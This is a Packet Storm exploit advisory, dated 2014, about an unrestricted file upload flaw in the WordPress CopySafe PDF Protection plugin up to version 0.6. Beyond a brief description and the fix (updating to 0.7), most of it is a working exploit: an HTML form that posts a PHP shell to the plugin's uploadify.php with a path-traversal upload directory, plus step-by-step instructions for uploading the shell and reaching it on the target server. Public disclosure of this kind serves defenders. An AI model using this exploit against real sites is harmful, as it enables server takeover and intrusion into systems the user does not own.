WordPress CopySafe PDF Protection 0.6 Shell Upload

2014-07-14T00:00:00
ID PACKETSTORM:127457
Type packetstorm
Reporter Jagriti Sahu
Modified 2014-07-14T00:00:00

Description

                                        
                                            `##################################################################################################  
#Exploit Title : Wordpress Plugin CopySafe PDF Protection Shell Upload   
vulnerability  
#Author : Jagriti Sahu  
#Download Link : http://wordpress.org/support/plugin/wp-copysafe-pdf  
#version affected : 0.6 and below  
#Date : 14/07/2014  
#Discovered at : IndiShell Lab  
#Love to : Surbhi, Mradula and Harry  
##################################################################################################  
  
////////////////////////  
/// Overview:  
////////////////////////  
Wordpress Plugin CopySafe PDF Protection(upto version 0.6) suffers   
from unrestricted file upload vulnerability which allow an attacker to   
upload malecious php shell on server.  
to avaid exploitation , update plugin to version 0.7  
  
///////////////////////////////  
// Vulnerability Description:  
///////////////////////////////  
vulnerability is due to lib/uploadify/uploadify.php file in which there   
is no check during file upload  
attacker need to forward file upload request to this file with PHP   
shell and file upload path  
  
  
///////////////////////  
/// exploit code ////  
///////////////////////  
  
  
<form   
action="http://website.com/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php"   
method="post"  
enctype="multipart/form-data">  
<label for="file">Filename:</label>  
<input type="file" name="wpcsp_file" ><br>  
<input type=text name="upload_path" value="../../../../uploads/">  
<input type="submit" name="submit" value="Submit">  
</form>  
  
save this code on you machine as exploit.html  
open exploit.html into webbrowser, brows your php shell and click   
submit button  
  
shell will be uploaded in uploads directory  
http://website.com/wp-content/uploads/shell.php  
  
`